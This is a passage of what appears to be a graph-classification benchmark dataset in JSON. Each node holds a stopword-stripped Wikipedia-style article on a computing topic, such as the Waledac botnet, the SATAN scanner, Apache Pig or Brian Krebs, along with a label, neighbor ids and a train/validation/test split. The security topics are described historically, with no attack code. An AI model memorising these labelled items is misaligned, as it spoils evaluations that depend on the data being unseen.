      4831,
      9696,
      3937,
      11232,
      2275,
      7793,
      1394,
      1907,
      1396,
      2931,
      3189,
      11643,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8788,
    "label": 1,
    "text": "SQLf:sqlf sqlf sql extended fuzzy set theory application expressing flexible fuzzy queries traditional ″regular″ relational databases among known extensions proposed sql present time complete allows use diverse fuzzy elements constructions language sql sqlf known proposal flexible query system allowing linguistic quantification set rows queries achieved extension sql nesting partitioning structures fuzzy quantifiers also allows use quantifiers qualify quantity search criteria satisfied single rows several mechanisms proposed query evaluation important one based derivation principle consists deriving classic queries produce given threshold -cut result fuzzy query additional processing cost using fuzzy language diminished fundamental querying structure sqlf multi-relational block conception structure based three basic operations relational algebra projection cartesian product selection application fuzzy sets ’ concepts result sqlf query fuzzy set rows fuzzy relation instead regular relation basic block sqlf consists codice_1 clause codice_2 clause optional codice_3 clause semantic query structure following example codice_1 query returns list hotels cheap query retrieves rows hotels table satisfice fuzzy predicate cheap defined fuzzy set μ= 25 30 result sorted descending order membership degree query",
    "neighbors": [
      10632,
      8201,
      6161,
      8979,
      2068,
      10389,
      7446,
      151,
      2456,
      1049,
      5658,
      5403,
      2972,
      10137,
      9631,
      9634,
      4263,
      2344,
      7080,
      10413,
      10286,
      3762,
      9397,
      3004,
      10048,
      5953,
      9286,
      2901,
      10326,
      987,
      2780,
      6239,
      4065,
      9828,
      6629,
      10471,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      11125,
      6775,
      1146,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8789,
    "label": 4,
    "text": "Waledac_botnet:waledac botnet waledac also known aliases waled waledpak botnet mostly involved e-mail spam malware march 2010 botnet taken microsoft eventual takedown waledac botnet consisted estimated 70,000-90,000 computers infected waledac computer worm botnet capable sending 1.5 billion spam messages day 1 total global spam volume february 25 2010 microsoft court order resulted temporary cut-off 277 domain names used command control servers botnet effectively crippling large part botnet however besides operating command control servers waledac worm also capable operating peer-to-peer communication various botnet nodes means extent damage difficult measure codenamed 'operation b49 investigation conducted months thereby yielded end 'zombie computers million 'zombie computers brought garrison hackers still infected early september 2010 microsoft granted ownership 277 domains used waledac broadcast spam email",
    "neighbors": [
      3072,
      10756,
      3724,
      3347,
      4883,
      2325,
      278,
      3867,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      3643,
      7739,
      7996,
      11583,
      8640,
      9664,
      9154,
      8133,
      10952,
      2508,
      81,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "None"
  },
  {
    "node_id": 8790,
    "label": 7,
    "text": "ChinaCache:chinacache founded 1998 chinacache provider internet content application delivery services china 3-tier internet ecosystem chinacache also offers internet data center management internet exchange operations cloud hosting services chinacache network interconnected operated three dominating telecom carriers china mobile china unicom china telecom local internet service providers china company headquartered beijing china offices sunnyvale ca diamond bar ca london uk hong kong 2017 chinacache received national cdn license chinese government chinacache founded song wang 1998 2000 chinacache received cdn license china ministry industry information technology 2007 chinacache north america established serve global customers first office diamond bar ca followed research development center sunnyvale opened 2011 october 2010 chinacache filed ipo became listed nasdaq ticker symbol ccih 2013 atecsys data center operated chinacache established located beijing tianzhu free trade zone data center offers co-location services well ip peering internet exchange center chn-ix year chinacache opened office hong kong expanding service capacities apac 2015 chinacache opened office london uk chinacache maintains 500 service nodes 120 major cities globally across china network interconnected china telecom china netcom china mobile china unicom china railcom china cernet various access providers 2007 chinacache received 31.5 million investment intel capital ignition partners year also announced partnership rawflow provider live peer-to-peer streaming technologies 2008 chinacache partnered adobe systems offer flash video streaming service china 2008 chinacache announced support microsoft silverlight cross-platform cross-browser plug-in august 2011 chinacache announced partnership shanxi unicom wentian technology build shanxi largest cloud computing data center enable facilities including disaster recovery centers enterprise data centers internet data centers 2012 chinacache collaborated telecom malaysia hutchison global communications interxion expand services asia europe august 2013 chinacache collaborated microsoft corp. integrate company cdn services windows azure china service customers china august 2013 chinacache announced partnership kingsoft cloud group provide comprehensive suite cloud-based network services",
    "neighbors": [
      10368
    ],
    "mask": "None"
  },
  {
    "node_id": 8791,
    "label": 4,
    "text": "Security_Administrator_Tool_for_Analyzing_Networks:security administrator tool analyzing networks security administrator tool analyzing networks satan free software vulnerability scanner analyzing networked computers satan captured attention broad technical audience appearing pc magazine drawing threats united states department justice featured web interface complete forms enter targets tables display results context-sensitive tutorials appeared vulnerability found offended name satan software contained special command called repent rearranged letters program acronym satan santa tool developed dan farmer wietse venema neil gaiman drew artwork satan documentation satan designed help systems administrators automate process testing systems known vulnerabilities exploited via network particularly useful networked systems multiple hosts like security tools useful good malicious purposes – also useful would-be intruders looking systems security holes satan written mostly perl utilized web browser netscape mosaic lynx provide user interface easy use interface drove scanning process presents results summary format well reporting presence vulnerabilities satan also gathered large amounts general network information hosts connected subnets types machines services offered satan fallen popularity height popularity 1990s satan released 1995 development ceased 2006 sectools.org conducted security popularity poll developed list 100 network security analysis tools order popularity based responses 3,243 people results suggest satan replaced nmap nessus lesser degree sara security auditor research assistant saint",
    "neighbors": [
      3172,
      8582,
      3503,
      7983,
      2739,
      5492,
      4373,
      2747,
      413
    ],
    "mask": "Test"
  },
  {
    "node_id": 8792,
    "label": 7,
    "text": "Dynamic_infrastructure:dynamic infrastructure dynamic infrastructure information technology paradigm concerning design data centers underlying hardware software respond dynamically changing levels demand fundamental efficient ways paradigm also known infrastructure 2.0 next generation data center vendors promoting dynamic infrastructures include ibm microsoft sun fujitsu hp dell bright computing basic premise dynamic infrastructures leverage pooled resources provide flexible capacity enabling allocation resources line demand business processes achieved using server virtualization technology pool computing resources wherever possible allocating resources on-demand using automated tools allows load balancing efficient approach keeping massive computing resources reserve run tasks take place example month otherwise under-utilized early examples server-level dynamic infrastructures flexframe sap flexframe oracle introduced fujitsu siemens computers fujitsu 2003 flexframe approach dynamically assign servers applications demand leveling peaks enabling organizations maximize benefit investments dynamic infrastructures may also used provide security data protection workloads moved migrations provisioning enhancing performance building co-location facilities dynamic infrastructures promoted enhance performance scalability system availability uptime increasing server utilization ability perform routine maintenance either physical virtual systems minimizing interruption business operations reducing cost dynamic infrastructures also provide fundamental business continuity high availability requirements facilitate cloud grid computing networking companies infrastructure 2.0 refers ability networks keep movement scale requirements new enterprise initiatives especially virtualization cloud computing according companies like cisco f5 networks infoblox network automation connectivity intelligence networks applications endpoints required reap full benefits virtualization many types cloud computing require network management infrastructure consolidated enabling higher levels dynamic control connectivity networks systems endpoints dynamic infrastructures take advantage intelligence gained across network design every dynamic infrastructure service-oriented focused supporting enabling end users highly responsive way utilize alternative sourcing approaches like cloud computing deliver new services agility speed global organizations already foundation dynamic infrastructure bring together business infrastructure create new possibilities example virtualized applications reduce cost testing packaging supporting application 60 reduced overall tco 5 7 model – source gartner – tco traditional software distribution vs application virtualization michael silver terrence cosgrove mark margevicious brian gammage 16 april 2008 green issues primary driver 10 current data center outsourcing hosting initiatives cost reductions initiatives driver 47 time aligned well green goals combining two means least 57 data center outsourcing hosting initiatives driven green – source gartner – green services catalyst cost optimization kurt potter 4 december 2008 2013 50 midsize organizations 75 large enterprises implement layered recovery architectures – source gartner – predicts 2009 business continuity management juggles standardization cost outsourcing risk roberta j witty john p morency dave russell donna scott rober desisto 28 january 2009",
    "neighbors": [
      1400,
      10757,
      5384,
      6157,
      3086,
      5006,
      4630,
      4255,
      9633,
      7972,
      3493,
      6311,
      10413,
      9137,
      5172,
      9397,
      10040,
      3771,
      9665,
      6850,
      5956,
      6856,
      5450,
      859,
      4194,
      4463,
      9455,
      6514,
      3960,
      3323,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 8793,
    "label": 6,
    "text": "Microsoft_Reserved_Partition:microsoft reserved partition microsoft reserved partition msr partition data storage device created simply reserve portion disk space possible subsequent use windows operating system installed separate partition meaningful data stored within msr though msr chunks may taken creation new partitions may contain data structures gpt label partition type codice_1 formerly disks formatted using older mbr partition layout certain software components used hidden sectors disk data storage purposes one example logical disk manager ldm disk converted basic disk dynamic disk would store metadata 1 mb area end disk allocated partition gpt formatted disks uefi partition specification allow hidden sectors microsoft reserves chunk disk space using msr partition type provide alternative data storage space software components previously may used hidden sectors mbr formatted disks software components example ldm mentioned create small software-component specific partition portion space reserved msr partition starting size msr depends disk size usually aligns following table size gets reduced portions msr taken used described beginning windows 10 minimum size msr 16 mb installer allocates default msr located efi system partition esp oem service partitions must located primary partitions bootable windows operating systems microsoft expects msr present every gpt disk recommends created disk initially partitioned chunks msr partition may also used remapping damaged sectors software device driver used temporary mirror critical operations core gpt structure emergency fast writing internal disk cache memory case power failure many disks fast write-through cache memory generally exceeding 32 mb msr created windows generally 128 mb default may larger systems fast recovery powering system contents msr generally data signature identify content make sure meaningful signature vendor-specific hardware component using normal operation system booted msr partition usually longer needed except device-specific power management systems may use msr also fast recoverable scratch area disk dynamically powered demand hardware raid managers msr may much smaller 1 2 mb start disk generally enough proper operation depending total disk size partition alignment parameters disks larger capacities 2 tb used servers may larger fast cache memory cache may backed frontal hidden ssd space needed msr area physical disk fast recovery case power failure using dynamic power management pcs preinstalled single ssd oem recovery partition usually end disk allows oem partition backed external dvd usb drive deleted ssd freeing space main data partition may extended free space old oem backup partition without move sectors ssd operation small msr partition may temporarily used scratch area recovery case unexpected failure conversion battery/power failure finally security tools may add data software components msr checking system integrity boot time uefi boot tools may also use msr temporary scratch area summary actual usage content msr device-specific invisible normal application software windows api msr partition exposed mountable volume contains standard filesystem msr partition visible within microsoft windows disk management control utility listed reserved microsoft diskpart command line utility bootable disks uefi systems msr partition generally second partition first small partition displayed system 100 mb containing fat32 filesystem store uefi boot data partitions actual main partition windows usually mounted volume c oses multiboot systems one several recovery partitions usually mounted visible microsoft windows disk management control utility oem system recovery partition usually located either end disk hard disks capacity 1tb near start disk msr partition large disks uefi-capable systems oem recovery partitions may also hidden microsoft windows disk management control utility using gpt partition attribute flag internal filesystem generally ntfs fat32 may mounted diskpart",
    "neighbors": [
      1801,
      6797,
      7983,
      1231,
      2811
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8794,
    "label": 2,
    "text": "Samsung_Galaxy_(original):samsung galaxy original samsung gt-i7500 galaxy mobile phone manufactured samsung uses open source android operating system announced 27 april 2009 released 29 june 2009 first android-powered device samsung mobile first would become long galaxy series succeeded samsung i5700 galaxy spica galaxy smartphone offering quad-band gsm announced tri-band hsdpa 900/1700/2100 7.2mbit/s however samsung official pages danish finnish norwegian swedish versions mention dual-band umts 900/2100 phone features 3.2-inch amoled capacitive touchscreen 5 megapixel autofocus camera power led flash digital compass unlike first android phone htc dream g1 i7500 standard 3.5mm headphone jack directional pad place trackball software-wise galaxy offers suite mobile google services including google search gmail youtube google calendar google talk phone gps enables google maps features location google latitude also supports mp3 aac including itunes plus downloads codec .aac format h.264 video beta version spotify music streaming service also available phone via android marketplace due lack firmware updates samsung received criticism original galaxy users countries samsung updated galaxy firmware donut 1.6 users countries could download update manually risk warranty voiding",
    "neighbors": [
      4609,
      8719,
      659,
      2707,
      10393,
      4890,
      7835,
      288,
      7983,
      1083,
      10045,
      10303,
      196,
      11082,
      2259,
      8921,
      8794,
      8285,
      10080,
      1776,
      1400,
      6266,
      5755
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8795,
    "label": 3,
    "text": "Intel_SHA_extensions:intel sha extensions intel sha extensions set extensions x86 instruction set architecture support hardware acceleration secure hash algorithm sha family introduced intel goldmont microarchitecture amd added support processors instructions starting ryzen seven new sse-based instructions four supporting sha-1 three sha-256",
    "neighbors": [
      9092,
      2821,
      4491,
      6924,
      4237,
      4622,
      6038,
      9369,
      9500,
      2088,
      9391,
      1972,
      8120,
      8506,
      6971,
      1085,
      5309,
      8125,
      704,
      833,
      7234,
      8126,
      9541,
      3142,
      6730,
      7755,
      1998,
      5326,
      977,
      2514,
      5844,
      9428,
      4603,
      3294,
      2655,
      1119,
      11487,
      1122,
      7783,
      9959,
      10985,
      4204,
      8684,
      5358,
      9582,
      8944,
      9964,
      499,
      1399,
      9976,
      1915,
      10620,
      6911
    ],
    "mask": "Test"
  },
  {
    "node_id": 8796,
    "label": 4,
    "text": "UDPCast:udpcast udpcast file transfer tool send data simultaneously many destinations lan instance used install entire classrooms pcs advantage udpcast using methods nfs ftp whatever udpcast uses user datagram protocol multicast abilities wo n't take longer install 15 machines would install 2 default protocol operates udp port 9000 default behaviour changed boot stage http //udpcast.linux.lu/",
    "neighbors": [
      6993,
      11413
    ],
    "mask": "Train"
  },
  {
    "node_id": 8797,
    "label": 4,
    "text": "Phoning_home:phoning home phoning home also called phone home call home computing refers act client server communication may undesirable user and/or proprietor device software often used refer behavior security systems report network location username data another computer phoning home may useful proprietor tracking missing stolen computer type phoning home frequently used mobile computers corporations typically involves software agent difficult detect remove however malicious types phoning home surreptitious communication applications hardware installed end-user sites manufacturers developers traffic may encrypted make difficult impractical end-user determine data transmitted stuxnet attack iran nuclear facilities facilitated phone home technology reported new york times uses phoning home practice legal countries example phoning home could purposes access restriction transmitting authorization key done adobe creative suite time one programs opened phones home serial number serial number listed already use fake program present user option inputting correct serial number user refuses next time program loads operate trial mode valid serial number input however method thwarted either disabling internet connection starting program adding firewall hosts file rule prevent program communicating verification server phoning home could also marketing purposes sony bmg rootkit transmits hash currently playing cd back sony digital video recorder dvr reporting viewing habits high-end computing systems mainframes 'phone home capabilities many years alert manufacturer hardware problems mainframes disk storage subsystems enables repair maintenance performed quickly even proactively maintenance contract similarly high-volume copy machines long equipped phone-home capabilities billing preventive/predictive maintenance purposes research computing phoning home used track daily usage open source academic software phoning used develop logs purposes justification grant proposals support ongoing funding projects aside malicious software phoning home phoning home may done track computer assets—especially mobile computers one well-known software applications leverages phoning home tracking absolute software computrace software employs agent calls absolute-managed server regular intervals information companies police use locate missing computer phoning home website applications authors applications allow documents thing thus allowing documents authors trigger essentially anonymous tracking setting connection intended logged behavior example caused v7.0.5 adobe reader add interactive notification whenever pdf file tries phoning author home html e-mail messages easily implement form phoning home images files required e-mail body may generate extra requests remote web server viewed ip address user computer sent web server unavoidable process reply required details embedded request urls identify user e-mail address marketing campaign etc extra page resources referred web bugs also used track off-line viewing uses ordinary web pages prevent activation requests many e-mail clients load images web resources html e-mails first viewed giving users option load images e-mail trusted source many malware applications phone home use gather store information person machine example pushdo trojan shows new complexity modern malware applications phoning home capabilities systems pushdo 421 executables available sent infected windows client surveillance cameras reported security researcher brian krebs secretly phone home manufacturer",
    "neighbors": [
      225,
      2945,
      3843,
      2244,
      6915,
      7713,
      8805,
      8998,
      4490,
      3629,
      10448,
      8978,
      7957,
      10392,
      7515,
      8797,
      11103
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8798,
    "label": 2,
    "text": "List_of_features_removed_in_Windows_7:list features removed windows 7 windows 7 contains many new features however similarly transition windows xp windows vista certain capabilities programs present windows vista longer present windows 7 changed following list features originated earlier versions windows included windows vista",
    "neighbors": [
      8576,
      641,
      11270,
      3463,
      9593,
      651,
      5004,
      6797,
      8080,
      8976,
      10896,
      11283,
      2196,
      4248,
      537,
      4505,
      540,
      7713,
      4515,
      8740,
      11301,
      3496,
      1577,
      6441,
      6697,
      10024,
      1581,
      3250,
      3890,
      9910,
      6972,
      6462,
      7615,
      321,
      7106,
      582,
      1098,
      10957,
      4174,
      10879,
      3922,
      8659,
      10835,
      9173,
      11605,
      2391,
      3289,
      4316,
      11103,
      4704,
      5600,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      3308,
      5356,
      9448,
      5103,
      10989,
      4210,
      7796,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Train"
  },
  {
    "node_id": 8799,
    "label": 7,
    "text": "Apache_Pig:apache pig apache pig high-level platform creating programs run apache hadoop language platform called pig latin pig execute hadoop jobs mapreduce apache tez apache spark pig latin abstracts programming java mapreduce idiom notation makes mapreduce programming high level similar sql relational database management systems pig latin extended using user-defined functions udfs user write java python javascript ruby groovy call directly language apache pig originally developed yahoo research around 2006 researchers ad-hoc way creating executing mapreduce jobs large data sets 2007 moved apache software foundation example word count program pig latin program generate parallel executable tasks distributed across multiple machines hadoop cluster count number words dataset webpages internet comparison sql pig hand argued dbmss substantially faster mapreduce system data loaded loading data takes considerably longer database systems also argued rdbmss offer box support column-storage working compressed data indexes efficient random data access transaction-level fault tolerance pig latin procedural fits naturally pipeline paradigm sql instead declarative sql users specify data two tables must joined join implementation use specify implementation join sql thus ... many sql applications query writer may enough knowledge data enough expertise specify appropriate join algorithm. pig latin allows users specify implementation aspects implementation used executing script several ways effect pig latin programming similar specifying query execution plan making easier programmers explicitly control flow data processing task sql oriented around queries produce single result sql handles trees naturally built mechanism splitting data processing stream applying different operators sub-stream pig latin script describes directed acyclic graph dag rather pipeline pig latin ability include user code point pipeline useful pipeline development sql used data must first imported database cleansing transformation process begin",
    "neighbors": [
      3462,
      6536,
      10377,
      8460,
      6797,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      9245,
      3877,
      10661,
      11303,
      2344,
      5677,
      10413,
      1327,
      7983,
      823,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      11343,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      10719,
      865,
      11235,
      3045,
      8294,
      11111,
      8425,
      8554,
      747,
      8810,
      2163,
      8821,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 8800,
    "label": 0,
    "text": "Aggregation_(linguistics):aggregation linguistics aggregation subtask natural language generation involves merging syntactic constituents sentences phrases together sometimes aggregation done conceptual level simple example syntactic aggregation merging two sentences john went shop john bought apple single sentence john went shop bought apple syntactic aggregation much complex example aggregation embed one constituents e.g. aggregate john went shop shop closed sentence john went shop closed pragmatic perspective aggregating sentences together often suggests reader sentences related case reader may confused example someone reads john went shop bought apple may infer apple bought shop case sentences aggregated aggregation algorithms must two things first issue deciding aggregate poorly understood aggegration decisions certainly depend semantic relations constituents mentioned also depend genre e.g. bureaucratic texts tend aggregated instruction manuals probably depend rhetorical discourse structure literacy level reader also probably important poor readers need shorter sentences integrated model brings factors together single algorithm regard second issue studies different types aggregation carried harbusch kempen describe several syntactic aggregation strategies terminology john went shop bought apple example forward conjunction reduction much less known conceptual aggregation di eugenio et al show conceptual aggregation done intelligent tutoring system demonstrate performing aggregation makes system effective conceptual aggregation make bigger impact syntactic aggregation unfortunately much software available performing aggregation however simplenlg system include limited support basic aggregation example following code causes simplenlg print man hungry buys apple",
    "neighbors": [
      2440
    ],
    "mask": "Train"
  },
  {
    "node_id": 8801,
    "label": 7,
    "text": "HyperCast:hypercast hypercast overlay middleware implemented java application-level overlay networks network applications use hypercast build overlay network top underlying networks internet without changing internet routing switching infrastructure hypercast supports multiple overlay topologies node discovery algorithms routing schemes multicast models etc designed simple interfaces application overlay functions allowing developers quickly create network applications without much knowledge internal details application-layer overlay networks hypercast introduces concept overlay sockets endpoints communication i.e node overlay network hypercast overlay network simply viewed collection overlay sockets overlay socket logical address physical address logical address unique address identifies node overlay network well route overlay messages among overlay sockets physical address overlay socket specifies address underlying network overlay socket send receive messages hypercast provides best-eﬀort communication service unreliable unordered possible duplication application messages referred overlay messages hypercast implements secure distributed peer-to-peer naming service",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 8802,
    "label": 4,
    "text": "Wanda_Sykes:wanda sykes wanda yvette sykes born march 7 1964 american actress comedian writer first recognized work writer chris rock show primetime emmy award 1999 2004 entertainment weekly named sykes one 25 funniest people america also known role barb baran cbs new adventures old christine 2006–10 hbo curb enthusiasm 2001–11 abc black-ish 2015–present aside television appearances sykes also career film appearing monster-in-law 2005 super ex-girlfriend 2006 evan almighty 2007 license wed 2007 well voicing characters animated films hedge 2006 barnyard 2006 brother bear 2 2006 rio 2011 2012 2016 animated film uglydolls 2019 born portsmouth virginia sykes family moved maryland third grade mother marion louise née peoples worked banker father harry ellsworth sykes u.s. army colonel employed pentagon sykes family history researched episode 2012 pbs genealogy program finding roots henry louis gates jr. ancestry traced back 1683 court case involving paternal ninth great-grandmother elizabeth banks free white woman indentured servant gave birth biracial child mary banks fathered slave inherited mother free status according historian ira berlin specialist history american slavery sykes family history case know possible trace black family rooted freedom late 17th century present sykes attended arundel high school gambrills maryland went graduate hampton university earned bachelor science degree marketing became member alpha kappa alpha college first job contracting specialist national security agency worked five years completely satisfied role national security agency nsa sykes began stand-up career coors light super talent showcase washington dc performed first time front live audience 1987 continued hone talents local venues nsa 1992 moved new york city one early tv appearances russell simmons def comedy jam early 1990s shared stage adele givens j b. smoove d. l. hughley bernie mac bill bellamy working hal leonard publishing house edited book entitled polyrhythms – musician guide peter magadini first big break came opening chris rock caroline comedy club 1997 joined writing team chris rock show also made many appearances show writing team nominated four emmys 1999 outstanding writing variety music comedy special since time appeared films pootie tang tv shows curb enthusiasm 2003 starred short-lived fox network sitcom wanda large year sykes appeared hour-long comedy central special tongue untied network also ranked 70 list 100 greatest all-time stand ups served correspondent hbo inside nfl hosted comedy central popular show premium blend voiced recurring character named gladys comedy central puppet show crank yankers also short-lived show comedy central called wanda addition film television work also author wrote yeah said book humorous observations various topics published september 2004 2006 landed recurring role barb opposite julia louis-dreyfus sitcom new adventures old christine became series regular series third season 2008 also guest starred grace episode buy buy baby 2006 provided voices 2006 films hedge barnyard brother bear 2 part super ex-girlfriend playing evan almighty bit part license wed sykes first hbo comedy special entitled wanda sykes sick tired premiered october 14 2006 nominated 2007 emmy award 2008 performed part cyndi lauper true colors tour lgbt rights october 2008 wanda sykes appeared television ad think speak campaign advertising campaign glsen aimed curbing homophobic slang youth communities 30-second spot uses humor scold teenager saying gay really means bad march 2009 announced sykes would host new late-night talk show saturdays fox wanda sykes show scheduled premiere november 7 2009 april 2009 named magazine annual power 50 list landing number 35 may 2009 sykes featured entertainer annual white house correspondents association dinner becoming first african american woman first openly lgbt person get role cedric entertainer first african american become featured entertainer 2005 event sykes made controversial headlines responded conservative radio talk show host rush limbaugh comments regarding president barack obama limbaugh reference obama presidential agenda said hope fails response sykes quipped hope limbaugh kidneys fail 'bout needs little waterboarding needs second comedy special wanda sykes i'ma premiered hbo october 2009 november 2009 saw premier wanda sykes show starts monologue continues panel discussion similar format bill maher shows real time bill maher politically incorrect appeared miss hannigan professional theatre production annie media theatre media pa suburb 25 minutes southwest philadelphia first appearance musical played role november 23 – december 12 2010 january 12–23 2011 voices witch bubble guppies episode bubble puppy fin-tastic fairlytale adventure 2012 sykes role voice granny 2016 returned voice granny blue sky studios ice age movies may 2013 sykes featured entertainer olivia travel 40th anniversary music comedy festival punta cana dominican republic 2013 sykes appeared eight episodes amazon alpha house political comedy series written doonesbury creator garry trudeau sykes plays rosalyn dupeche democratic senator illinois next door neighbor four republican senators living together house capitol hill sykes also appeared season two became available october 2014 series canceled second season 2018 announced sykes would head writer revived tenth season roseanne attracted attention due roseanne far-right conspiratorial views may 29 2018 sykes announced twitter would longer working series since-deleted twitter rant roseanne barr valerie jarrett sykes married record producer dave hall 1991 1998 november 2008 publicly came lesbian same-sex marriage rally las vegas regarding proposition 8 month earlier sykes married wife alex niedbalski french woman met 2006 couple also became parents april 2009 alex gave birth pair fraternal twins daughter son named olivia lucas sykes came conservative mother marion father harry 40 initially difficulty accepting homosexuality declined attend wedding alex led brief period estrangement since reconciled sykes proud grandparents couple children september 19 2011 appearance ellen degeneres show sykes announced diagnosed earlier year ductal carcinoma situ dcis although dcis non-invasive stage zero breast cancer sykes elected bilateral mastectomy order lower chances getting breast cancer. ref",
    "neighbors": [
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 8803,
    "label": 0,
    "text": "Machine_translation_software_usability:machine translation software usability sections give objective criteria evaluating usability machine translation software output repeated translations converge single expression languages i.e translation method show stationarity produce canonical form translation become stationary without losing original meaning metric criticized well correlated bleu bilingual evaluation understudy scores system adaptive colloquialism argot slang french language many rules creating words speech writing popular culture two rules reverse spelling words femme meuf called verlan b attachment suffix -ard noun verb form proper noun example noun faluche means student hat word faluchard formed faluche colloquially mean depending context group students gathering students behavior typical student google translator 28 december 2006 n't derive constructed words example rule b shown il une chorale falucharde mercredi venez nombreux les faluchards chantent des paillardes == choral society falucharde wednesday come many faluchards sing loose-living women french argot three levels usage united states national institute standards technology conducts annual evaluations machine translation systems based bleu-4 criterion combined method called iqmt incorporates bleu additional metrics nist gtm rouge meteor implemeneted gimenez amigo output grammatical well-formed target language using interlingua helpful regard fixed interlingua one able write grammatical mapping target language interlingua consider following arabic language input english language translation result google translator 27 december 2006 google translator output n't parse using reasonable english grammar repeated re-translations preserve semantics original sentence example consider following english input passed multiple times french using google translator 27 december 2006 noted kind round-trip translation unreliable method evaluation interesting peculiarity google translate 24 january 2008 corrected 25 january 2008 following result translating english spanish shows embedded joke english-spanish dictionary added poignancy given recent events raises issue trustworthiness relying machine translation system embedded life-critical system translation system input safety critical decision making process conjointly raises issue whether given use software machine translation system safe hackers known whether feature google translate result joke/hack perhaps unintended consequence use method statistical machine translation reporters cnet networks asked google explanation january 24 2008 google said internal issue google translate mistranslation subject much hilarity speculation internet unintended consequence use method statistical machine translation joke/hack event demonstration potential source critical unreliability statistical machine translation method human translations particular part interpreters selectivity part translator performing translation often commented one two parties served interpreter knows languages leads issue whether particular translation could considered verifiable case converging round-trip translation would kind verification",
    "neighbors": [
      7164,
      4956
    ],
    "mask": "Train"
  },
  {
    "node_id": 8804,
    "label": 1,
    "text": "Upsizing_(database):upsizing database upsizing term coined microsoft describe process upgrading microsoft access database microsoft sql server allows continue using microsoft access database front-end whereas actual back-end served separate local remote sql server allowing much higher productivity data volumes microsoft access version 2000 special upsizing wizard facilitates data migration proprietary microsoft sql server rdbms currently supported upsizing two strategies database migrated access sql server first strategy often seen first step towards complete migration sql server stage 2 seen part strategy 2 peculiarities every strategy see table data migration procedure microsoft access database upsizing requires fundamental refactoring database structure source code even though aspects procedure seem automatized upsizing wizard still many points requiring human intervention following changes done upsizing",
    "neighbors": [
      7523,
      4647,
      2183,
      10413,
      11030,
      5401
    ],
    "mask": "Test"
  },
  {
    "node_id": 8805,
    "label": 4,
    "text": "Brian_Krebs:brian krebs brian krebs born 1972 alabama american journalist investigative reporter best known coverage profit-seeking cybercriminals interest grew computer worm locked computer 2001 krebs author daily blog codice_1 covering computer security cybercrime 1995 2009 krebs reporter washington post covered tech policy privacy computer security well authoring security fix blog also known interviewing hacker 0x80 march 14 2013 krebs became one first journalists become victim swatting december 18 2013 krebs broke story target corporation breached 40 million credit cards six days later krebs identified ukrainian man krebs said behind primary black market site selling target customers credit debit card information much us 100 apiece 2014 krebs published book called spam nation inside story organized cybercrime global epidemic front door went win 2015 prose award krebs earned b.a international relations george mason university 1994 krebs started career washington post circulation department obtained job copy aide post newsroom split time sorting mail taking dictation reporters field krebs also worked editorial aide editorial department financial desk 1999 krebs went work staff writer newsbytes.com technology newswire owned washington post post sold newsbytes 2002 krebs transitioned washingtonpost.com arlington virginia full-time staff writer krebs stories appeared print edition paper washingtonpost.com 2005 krebs launched security fix blog daily blog centered around computer security cyber crime tech policy december 2009 krebs left washingtonpost.com launched krebsonsecurity.com krebs focused reporting blog fallout activities several organized cybercrime groups operating eastern europe stolen tens millions dollars small mid-sized businesses online banking fraud krebs written 75 stories small businesses organizations victims online banking fraud increasingly costly common form cybercrime krebs wrote series investigative stories culminated disconnection dissolution several internet service providers experts said catered primarily cyber criminals august 2008 series articles wrote washington post security fix blog led unplugging northern california based hosting provider known intercage atrivo time krebs published two-part investigation illicit activity domain name registrar estdomains one atrivo biggest customers showing company president vladimir tšaštšin recently convicted credit card fraud document forgery money laundering two months later internet corporation assigned names numbers icann entity charged overseeing domain registration industry revoked estdomains charter noting tšaštšin convictions violated icann policy prohibits officers registrar criminal record november 2011 tšaštšin five men would arrested estonian authorities charged running massive click fraud operation help dns changer trojan november 2008 krebs published investigative series led disconnection mccolo another northern california hosting firm experts said home control networks world largest botnets result krebs reporting mccolo upstream internet providers disconnected mccolo rest internet causing immediate sustained drop volume junk e-mail sent worldwide estimates amount duration decline spam due mccolo takedown vary 40 percent 70 percent weeks several months krebs credited first journalist 2010 report malware would later become known stuxnet 2012 cited follow-up another breach credit debit card data case potentially 10 million visa mastercard accounts transactions handled global payments inc. atlanta georgia 2016 krebs blog target one largest ever ddos attacks apparently retaliation krebs role investigating vdos botnet akamai hosting blog pro bono basis quit hosting blog result attack causing shut google project shield taken task protecting site also pro-bono basis article krebs 27 march 2018 krebsonsecurity.com mining software company script coinhive krebs published names admins german imageboard pr0gramm former admin inventor script owner company answered unusual protest action users imageboard using pun krebs meaning cancer german donated charitable organisations fighting diseases collecting 200,000 euro 245,000 usd donations evening 28 march deutsche krebshilfe charity krebs frequent speaker computer security cybercrime topics october 2011 gave keynote addresses",
    "neighbors": [
      3843,
      1417,
      10252,
      4753,
      2837,
      5025,
      9771,
      6834,
      3395,
      5699,
      6728,
      6473,
      7370,
      8779,
      4945,
      7251,
      3032,
      4314,
      8797,
      3807,
      106,
      8818,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8806,
    "label": 2,
